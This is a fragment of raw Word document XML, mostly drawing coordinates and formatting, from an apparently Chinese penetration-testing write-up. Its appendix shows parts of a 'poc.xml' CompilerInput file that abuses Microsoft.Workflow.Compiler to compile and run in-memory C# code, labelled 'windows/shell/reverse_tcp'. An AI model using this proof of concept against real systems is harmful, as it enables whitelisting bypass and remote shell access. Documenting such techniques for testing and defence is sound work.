5913,15272,5916,15272,5919,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15272,5922,15273,5922,15273,5922,15273,5922,15273,5922,15273,5922,15274,5922,15274,5922,15274,5922,15274,5922,15275,5922,15275,5922,15275,5922,15276,5922,15276,5922,15277,5922,15277,5922,15278,5922,15278,5922,15279,5922,15279,5922,15280,5922,15281,5922,15281,5922,15282,5922,15283,5922,15284,5922,15285,5922,15285,5922,15286,5922,15287,5922,15288,5922,15290,5922,15291,5922,15292,5922,15293,5922,15294,5922,15296,5922,15297,5922,15298,5922,15300,5922,15301,5922,15303,5922,15304,5922,15306,5922,15308,5922,15310,5922,15311,5922,15313,5922,15315,5922,15317,5922,15319,5922,15321,5922,15324,5922,15326,5922,15328,5922,15331,5922,15333,5922,15336,5922,15338,5922,15341,5922,15344,5922,15346,5922,15349,5922,15352,5922,15355,5922,15358,5922,15361,5922,15365,5922,15368,5922,15371,5922,15375,5922,15378,5922,15382,5922,15386,5922,15390,5922,15393,5922,15397,5922,15402,5922,15406,5922,15410,5922,15414,5922,15419,5922,15423,5922,15428,5922,15432,5922,15437,5922,15442,5922,15447,5922,15452,5922,15457,5922,15462,5922,15468,5922,15473,5922,15479,5922,15484,5922,15490,5922,15496,5922,15502,5922,15508,5922,15514,5922,15520,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5922,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5921,15527,5920,15527,5920,15527,5920,15527,5920,15527,5920,15527,5919,15527,5919,15527,5919,15527,5919,15527,5918,15527,5918,15527,5918,15527,5917,15527,5917,15527,5917,15527,5916,15527,5916,15527,5915,15527,5915,15527,5915,15527,5914,15527,5914,15527,5913,15527,5913,15527,5912,15527,5911,15527,5911,15527,5910,15527,5909,15527,5909,15527,5908,15527,5907,15527,5907,15527,5906,15527,5905,15527,5904,15527,5903,15527,5902,15527,5902,15527,5901,15527,5900,15527,5899,15527,5898,15527,5896,15527,5895,15527,5894,15527,5893,15527,5892,15527,5891,15527,5889,15527,5888,15527,5887,15527,5886,15527,5884,15527,5883,15527,5881,15527,5880,15527,5878,15527,5877,15527,5875,15527,5873,15527,5872,15527,5870,15527,5868,15527,5867,15527,5865,15527,5863,15527,5861,15527,5859,15527,5857,15527,5855,15527,5853,15527,5851,15527,5849,15527,5846,15527,5844,15527,5842,15527,5840,15527,5837,15527,5835,15527,5832,15527,5830,15527,5827,15527,5825,15527,5822,15527,5819,15527,5816,15527,5814,15527,5811,15527,5808,15527,5805,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15527,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15526,5802,15525,5802,15525,5802,15525,5802,15525,5802,15524,5802,15524,5802,15524,5802,15524,5802,15523,5802,15523,5802,15522,5802,15522,5802,15521,5802,15521,5802,15520,5802,15520,5802,15519,5802,15519,5802,15518,5802,15517,5802,15516,5802,15516,5802,15515,5802,15514,5802,15513,5802,15512,5802,15511,5802,15510,5802,15509,5802,15508,5802,15507,5802,15506,5802,15504,5802,15503,5802,15502,5802,15500,5802,15499,5802,15497,5802,15496,5802,15494,5802,15492,5802,15491,5802,15489,5802,15487,5802,15485,5802,15483,5802,15481,5802,15479,5802,15477,5802,15475,5802,15473,5802,15470,5802,15468,5802,15465,5802,15463,5802,15460,5802,15458,5802,15455,5802,15452,5802,15449,5802,15446,5802,15443,5802,15440,5802,15437,5802,15434,5802,15431,5802,15427,5802,15424,5802,15420,5802,15416,5802,15413,5802,15409,5802,15405,5802,15401,5802,15397,5802,15393,5802,15389,5802,15384,5802,15380,5802,15375,5802,15371,5802,15366,5802,15361,5802,15357,5802,15352,5802,15347,5802,15341,5802,15336,5802,15331,5802,15325,5802,15320,5802,15314,5802,15308,5802,15303,5802,15297,5802,15291,5802,15284,5802,15278,5802,15272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20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>附录：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p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oc.xml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注：window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s/shell/reverse_tcp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?xml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version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"1.0"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encoding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"utf‐8"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?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CompilerInput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xmlns:i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"http://www.w3.org/2001/XMLSchema‐instance"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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xml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"http://schemas.datacontract.org/200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4/07/Microsoft.Workflow.Compiler"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54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11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files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xmlns:d2p1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"http://schemas.microsoft.com/2003/10/Serializatio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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n/Arrays"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&gt;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d2p1:string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tcp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d2p1:string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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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parameters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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xmlns:d2p1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"http://schemas.datacontract.org/2004/07/Syste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m.Workflow.ComponentModel.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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12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assemblyNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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"http://schemas.microsoft.com/2003/10/Seria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lization/Arrays"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-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"http://schemas.datacontract.org/2004/07/System.Co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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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8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7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compilerOptions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2004/07/System.CodeDom.Compiler"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748.601pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,14972">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:14972" coordorigin="10402,0" coordsize="0,14972" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,3,10402,4,10402,6,10402,8,10402,11,10402,15,10402,19,10402,24,10402,29,10402,36,10402,43,10402,51,10402,60,10402,71,10402,82,10402,94,10402,108,10402,122,10402,138,10402,156,10402,174,10402,195,10402,216,10402,239,10402,264,10402,291,10402,319,10402,349,10402,380,10402,414,10402,450,10402,487,10402,527,10402,568,10402,612,10402,658,10402,706,10402,756,10402,809,10402,864,10402,922,10402,982,10402,1045,10402,1110,10402,1178,10402,1249,10402,1322,10402,1399,10402,1478,10402,1560,10402,1645,10402,1733,10402,1824,10402,1919,10402,2016,10402,2117,10402,2221,10402,2329,10402,2439,10402,2554,10402,2672,10402,2793,10402,2918,10402,3047,10402,3179,10402,3316,10402,3456,10402,3600,10402,3748,10402,3900,10402,4056,10402,4216,10402,4380,10402,4548,10402,4721,10402,4898,10402,5080,10402,5265,10402,5456,10402,5651,10402,5850,10402,6054,10402,6263,10402,6476,10402,6695,10402,6918,10402,7146,10402,7379,10402,7617,10402,7860,10402,8108,10402,8362,10402,8620,10402,8884,10402,9153,10402,9428,10402,9708,10402,9994,10402,10285,10402,10581,10402,10884,10402,11192,10402,11505,10402,11825,10402,12150,10402,12482,10402,12819,10402,13162,10402,13512,10402,13868,10402,14229,10402,14597,10402,14972e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.0pt;width:451.800pt;height:702.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-1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coreAssemblyFileName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System.CodeDom.Compiler"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&gt;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coreAssemblyFileName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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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embeddedResources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"http://schemas.microsoft.com/2003/10/S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erialization/Arrays"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-10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"http://schemas.datacontract.org/2004/07/Syste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m.CodeDom.Compiler"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92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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evidence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"http://schemas.datacontract.org/2004/07/System.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Security.Policy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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1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4/07/System.CodeDom.Compiler"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generateExecutable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"http://schemas.datacontract.org/2004/07/Sy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stem.CodeDom.Compiler"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generateExecutable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&gt;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generateInMemory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"http://schemas.datacontract.org/2004/07/Syst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em.CodeDom.Compiler"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true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generateInMemory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&gt;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includeDebugInformation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07/System.CodeDom.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17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includeDebugInformation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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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linkedResources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"http://schemas.microsoft.com/2003/10/Ser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ialization/Arrays"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-8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"http://schemas.datacontract.org/2004/07/System.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8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mainClass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7/System.CodeDom.Compiler"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11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outputName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"http://schemas.datacontract.org/2004/07/System.Cod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eDom.Compiler"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&gt;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outputName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&gt;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8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tempFiles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7/System.CodeDom.Compiler"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45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treatWarningsAsErrors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7/System.CodeDom.Compiler"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17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treatWarningsAsErrors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&gt;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warningLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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"http://schemas.datacontract.org/2004/07/System.C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odeDom.Compiler"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1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warningLevel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&gt;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7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win32Resource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04/07/System.CodeDom.Compiler"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d2p1:checkTypes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d2p1:checkTypes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d2p1:compileWithNoCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="20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d2p1:compileWithNoCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="20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d2p1:compilerOptions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d2p1:generateCCU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&gt;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d2p1:generateCCU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d2p1:languageToUse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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CSharp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d2p1:languageToUse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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d2p1:libraryPaths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"http://schemas.microsoft.com/2003/10/S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erialization/Arrays"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d2p1:localAssembly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07/System.Reflection"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d2p1:mtInfo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d2p1:userCodeCCUs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xmlns:d3p1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"http://schemas.datacontract.org/2004/0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7/System.CodeDom"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i:nil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parameters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CompilerInput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&gt;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92.21pt;width:0.0pt;height:749.978pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,1840" coordsize="0,14999">
        <v:shape style="position:absolute;left:10402;top:1840;width:0;height:14999" coordorigin="10402,1840" coordsize="0,14999" path="m10402,1840l10402,1840,10402,1840,10402,1840,10402,1840,10402,1840,10402,1841,10402,1842,10402,1843,10402,1844,10402,1846,10402,1849,10402,1852,10402,1855,10402,1859,10402,1864,10402,1870,10402,1876,10402,1884,10402,1892,10402,1901,10402,1911,10402,1922,10402,1935,10402,1948,10402,1963,10402,1979,10402,1996,10402,2015,10402,2035,10402,2057,10402,2080,10402,2105,10402,2132,10402,2160,10402,2190,10402,2222,10402,2255,10402,2291,10402,2328,10402,2368,10402,2410,10402,2453,10402,2499,10402,2548,10402,2598,10402,2651,10402,2706,10402,2764,10402,2824,10402,2887,10402,2953,10402,3021,10402,3091,10402,3165,10402,3242,10402,3321,10402,3403,10402,3488,10402,3577,10402,3668,10402,3763,10402,3860,10402,3961,10402,4066,10402,4173,10402,4284,10402,4399,10402,4517,10402,4639,10402,4764,10402,4893,10402,5026,10402,5162,10402,5303,10402,5447,10402,5595,10402,5747,10402,5904,10402,6064,10402,6228,10402,6397,10402,6570,10402,6748,10402,6929,10402,7116,10402,7306,10402,7501,10402,7701,10402,7906,10402,8115,10402,8329,10402,8547,10402,8771,10402,8999,10402,9233,10402,9471,10402,9715,10402,9964,10402,10217,10402,10477,10402,10741,10402,11011,10402,11286,10402,11566,10402,11852,10402,12144,10402,12441,10402,12744,10402,13053,10402,13367,10402,13687,10402,14013,10402,14345,10402,14683,10402,15027,10402,15377,10402,15733,10402,16096,10402,16465,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:91.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1830" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1830;width:8990;height:390" coordorigin="1490,1830" coordsize="8990,390" path="m1510,1840l1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1511,1840,1512,1840,1512,1840,1514,1840,1515,1840,1517,1840,1519,1840,1521,1840,1524,1840,1528,1840,1532,1840,1536,1840,1541,1840,1546,1840,1552,1840,1559,1840,1566,1840,1575,1840,1583,1840,1593,1840,1603,1840,1615,1840,1627,1840,1640,1840,1654,1840,1668,1840,1684,1840,1701,1840,1719,1840,1738,1840,1758,1840,1780,1840,1802,1840,1826,1840,1851,1840,1877,1840,1904,1840,1933,1840,1963,1840,1995,1840,2028,1840,2063,1840,2099,1840,2136,1840,2175,1840,2216,1840,2259,1840,2303,1840,2348,1840,2396,1840,2445,1840,2496,1840,2549,1840,2604,1840,2660,1840,2719,1840,2779,1840,2841,1840,2906,1840,2972,1840,3041,1840,3112,1840,3184,1840,3259,1840,3336,1840,3416,1840,3498,1840,3582,1840,3668,1840,3757,1840,3848,1840,3941,1840,4037,1840,4136,1840,4236,1840,4340,1840,4446,1840,4555,1840,4666,1840,4780,1840,4897,1840,5017,1840,5139,1840,5264,1840,5392,1840,5523,1840,5657,1840,5793,1840,5933,1840,6076,1840,6222,1840,6370,1840,6522,1840,6677,1840,6835,1840,6997,1840,7161,1840,7329,1840,7500,1840,7675,1840,7853,1840,8034,1840,8219,1840,8407,1840,8598,1840,8793,1840,8992,1840,9194,1840,9400,1840,9609,1840,9823,1840,10039,1840,10260,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1841,10484,1841,10484,1841,10484,1841,10484,1841,10484,1842,10484,1842,10484,1842,10484,1842,10484,1843,10484,1843,10484,1844,10484,1844,10484,1844,10484,1845,10484,1846,10484,1846,10484,1847,10484,1848,10484,1848,10484,1849,10484,1850,10484,1851,10484,1852,10484,1853,10484,1854,10484,1855,10484,1856,10484,1857,10484,1858,10484,1860,10484,1861,10484,1862,10484,1864,10484,1866,10484,1867,10484,1869,10484,1871,10484,1872,10484,1874,10484,1876,10484,1878,10484,1881,10484,1883,10484,1885,10484,1887,10484,1890,10484,1892,10484,1895,10484,1898,10484,1901,10484,1904,10484,1906,10484,1910,10484,1913,10484,1916,10484,1919,10484,1923,10484,1926,10484,1930,10484,1934,10484,1938,10484,1942,10484,1946,10484,1950,10484,1954,10484,1958,10484,1963,10484,1968,10484,1972,10484,1977,10484,1982,10484,1987,10484,1992,10484,1998,10484,2003,10484,2009,10484,2014,10484,2020,10484,2026,10484,2032,10484,2038,10484,2045,10484,2051,10484,2058,10484,2065,10484,2071,10484,2078,10484,2086,10484,2093,10484,2100,10484,2108,10484,2116,10484,2124,10484,2132,10484,2140,10484,2148,10484,2157,10484,2165,10484,2174,10484,2183,10484,2192,10484,2201,10484,2211,10484,2220,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10483,2230,10482,2230,10482,2230,10480,2230,10479,2230,10477,2230,10475,2230,10473,2230,10470,2230,10466,2230,10462,2230,10458,2230,10453,2230,10448,2230,10442,2230,10435,2230,10428,2230,10419,2230,10411,2230,10401,2230,10391,2230,10379,2230,10367,2230,10354,2230,10340,2230,10326,2230,10310,2230,10293,2230,10275,2230,10256,2230,10236,2230,10215,2230,10192,2230,10168,2230,10143,2230,10117,2230,10090,2230,10061,2230,10031,2230,9999,2230,9966,2230,9931,2230,9895,2230,9858,2230,9819,2230,9778,2230,9735,2230,9691,2230,9646,2230,9598,2230,9549,2230,9498,2230,9445,2230,9391,2230,9334,2230,9275,2230,9215,2230,9153,2230,9088,2230,9022,2230,8953,2230,8883,2230,8810,2230,8735,2230,8658,2230,8578,2230,8497,2230,8413,2230,8326,2230,8238,2230,8146,2230,8053,2230,7957,2230,7859,2230,7758,2230,7654,2230,7548,2230,7439,2230,7328,2230,7214,2230,7097,2230,6977,2230,6855,2230,6730,2230,6602,2230,6471,2230,6337,2230,6201,2230,6061,2230,5918,2230,5773,2230,5624,2230,5472,2230,5317,2230,5159,2230,4997,2230,4833,2230,4665,2230,4494,2230,4319,2230,4141,2230,3960,2230,3776,2230,3587,2230,3396,2230,3201,2230,3002,2230,2800,2230,2594,2230,2385,2230,2172,2230,1955,2230,1734,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2229,1510,2229,1510,2229,1510,2229,1510,2229,1510,2229,1510,2228,1510,2228,1510,2228,1510,2227,1510,2227,1510,2227,1510,2226,1510,2226,1510,2225,1510,2224,1510,2224,1510,2223,1510,2223,1510,2222,1510,2221,1510,2220,1510,2219,1510,2218,1510,2217,1510,2216,1510,2215,1510,2214,1510,2213,1510,2212,1510,2210,1510,2209,1510,2208,1510,2206,1510,2205,1510,2203,1510,2201,1510,2199,1510,2198,1510,2196,1510,2194,1510,2192,1510,2189,1510,2187,1510,2185,1510,2183,1510,2180,1510,2178,1510,2175,1510,2172,1510,2169,1510,2167,1510,2164,1510,2160,1510,2157,1510,2154,1510,2151,1510,2147,1510,2144,1510,2140,1510,2136,1510,2132,1510,2128,1510,2124,1510,2120,1510,2116,1510,2112,1510,2107,1510,2102,1510,2098,1510,2093,1510,2088,1510,2083,1510,2078,1510,2072,1510,2067,1510,2061,1510,2056,1510,2050,1510,2044,1510,2038,1510,2032,1510,2025,1510,2019,1510,2012,1510,2005,1510,1999,1510,1992,1510,1984,1510,1977,1510,1970,1510,1962,1510,1954,1510,1946,1510,1938,1510,1930,1510,1922,1510,1913,1510,1905,1510,1896,1510,1887,1510,1878,1510,1869,1510,1859,1510,1850,1510,1840e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:90.599pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:110.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2210" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2210;width:8990;height:370" coordorigin="1490,2210" coordsize="8990,370" path="m1510,2230l1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1510,2230,1511,2230,1512,2230,1512,2230,1514,2230,1515,2230,1517,2230,1519,2230,1521,2230,1524,2230,1528,2230,1532,2230,1536,2230,1541,2230,1546,2230,1552,2230,1559,2230,1566,2230,1575,2230,1583,2230,1593,2230,1603,2230,1615,2230,1627,2230,1640,2230,1654,2230,1668,2230,1684,2230,1701,2230,1719,2230,1738,2230,1758,2230,1780,2230,1802,2230,1826,2230,1851,2230,1877,2230,1904,2230,1933,2230,1963,2230,1995,2230,2028,2230,2063,2230,2099,2230,2136,2230,2175,2230,2216,2230,2259,2230,2303,2230,2348,2230,2396,2230,2445,2230,2496,2230,2549,2230,2604,2230,2660,2230,2719,2230,2779,2230,2841,2230,2906,2230,2972,2230,3041,2230,3112,2230,3184,2230,3259,2230,3336,2230,3416,2230,3498,2230,3582,2230,3668,2230,3757,2230,3848,2230,3941,2230,4037,2230,4136,2230,4236,2230,4340,2230,4446,2230,4555,2230,4666,2230,4780,2230,4897,2230,5017,2230,5139,2230,5264,2230,5392,2230,5523,2230,5657,2230,5793,2230,5933,2230,6076,2230,6222,2230,6370,2230,6522,2230,6677,2230,6835,2230,6997,2230,7161,2230,7329,2230,7500,2230,7675,2230,7853,2230,8034,2230,8219,2230,8407,2230,8598,2230,8793,2230,8992,2230,9194,2230,9400,2230,9609,2230,9823,2230,10039,2230,10260,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2230,10484,2231,10484,2231,10484,2231,10484,2231,10484,2231,10484,2231,10484,2232,10484,2232,10484,2232,10484,2232,10484,2233,10484,2233,10484,2233,10484,2234,10484,2234,10484,2235,10484,2235,10484,2236,10484,2236,10484,2237,10484,2238,10484,2239,10484,2239,10484,2240,10484,2241,10484,2242,10484,2243,10484,2244,10484,2245,10484,2246,10484,2247,10484,2248,10484,2250,10484,2251,10484,2252,10484,2254,10484,2255,10484,2257,10484,2258,10484,2260,10484,2262,10484,2264,10484,2266,10484,2268,10484,2270,10484,2272,10484,2274,10484,2276,10484,2279,10484,2281,10484,2284,10484,2286,10484,2289,10484,2292,10484,2294,10484,2297,10484,2300,10484,2303,10484,2307,10484,2310,10484,2313,10484,2317,10484,2320,10484,2324,10484,2328,10484,2332,10484,2336,10484,2340,10484,2344,10484,2348,10484,2352,10484,2357,10484,2361,10484,2366,10484,2371,10484,2376,10484,2381,10484,2386,10484,2391,10484,2397,10484,2402,10484,2408,10484,2413,10484,2419,10484,2425,10484,2431,10484,2438,10484,2444,10484,2450,10484,2457,10484,2464,10484,2471,10484,2478,10484,2485,10484,2492,10484,2499,10484,2507,10484,2515,10484,2522,10484,2530,10484,2539,10484,2547,10484,2555,10484,2564,10484,2572,10484,2581,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10484,2590,10483,2590,10482,2590,10482,2590,10480,2590,10479,2590,10477,2590,10475,2590,10473,2590,10470,2590,10466,2590,10462,2590,10458,2590,10453,2590,10448,2590,10442,2590,10435,2590,10428,2590,10419,2590,10411,2590,10401,2590,10391,2590,10379,2590,10367,2590,10354,2590,10340,2590,10326,2590,10310,2590,10293,2590,10275,2590,10256,2590,10236,2590,10215,2590,10192,2590,10168,2590,10143,2590,10117,2590,10090,2590,10061,2590,10031,2590,9999,2590,9966,2590,9931,2590,9895,2590,9858,2590,9819,2590,9778,2590,9735,2590,9691,2590,9646,2590,9598,2590,9549,2590,9498,2590,9445,2590,9391,2590,9334,2590,9275,2590,9215,2590,9153,2590,9088,2590,9022,2590,8953,2590,8883,2590,8810,2590,8735,2590,8658,2590,8578,2590,8497,2590,8413,2590,8326,2590,8238,2590,8146,2590,8053,2590,7957,2590,7859,2590,7758,2590,7654,2590,7548,2590,7439,2590,7328,2590,7214,2590,7097,2590,6977,2590,6855,2590,6730,2590,6602,2590,6471,2590,6337,2590,6201,2590,6061,2590,5918,2590,5773,2590,5624,2590,5472,2590,5317,2590,5159,2590,4997,2590,4833,2590,4665,2590,4494,2590,4319,2590,4141,2590,3960,2590,3776,2590,3587,2590,3396,2590,3201,2590,3002,2590,2800,2590,2594,2590,2385,2590,2172,2590,1955,2590,1734,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2590,1510,2589,1510,2589,1510,2589,1510,2589,1510,2589,1510,2588,1510,2588,1510,2588,1510,2587,1510,2587,1510,2587,1510,2586,1510,2586,1510,2585,1510,2585,1510,2584,1510,2583,1510,2583,1510,2582,1510,2581,1510,2580,1510,2579,1510,2579,1510,2578,1510,2577,1510,2576,1510,2574,1510,2573,1510,2572,1510,2571,1510,2569,1510,2568,1510,2567,1510,2565,1510,2564,1510,2562,1510,2560,1510,2558,1510,2557,1510,2555,1510,2553,1510,2551,1510,2549,1510,2546,1510,2544,1510,2542,1510,2539,1510,2537,1510,2534,1510,2532,1510,2529,1510,2526,1510,2523,1510,2520,1510,2517,1510,2514,1510,2511,1510,2507,1510,2504,1510,2500,1510,2496,1510,2493,1510,2489,1510,2485,1510,2481,1510,2477,1510,2472,1510,2468,1510,2464,1510,2459,1510,2454,1510,2450,1510,2445,1510,2440,1510,2434,1510,2429,1510,2424,1510,2418,1510,2413,1510,2407,1510,2401,1510,2395,1510,2389,1510,2383,1510,2377,1510,2370,1510,2363,1510,2357,1510,2350,1510,2343,1510,2336,1510,2328,1510,2321,1510,2314,1510,2306,1510,2298,1510,2290,1510,2282,1510,2274,1510,2265,1510,2257,1510,2248,1510,2239,1510,2230e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:110.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2210" coordsize="30,370">
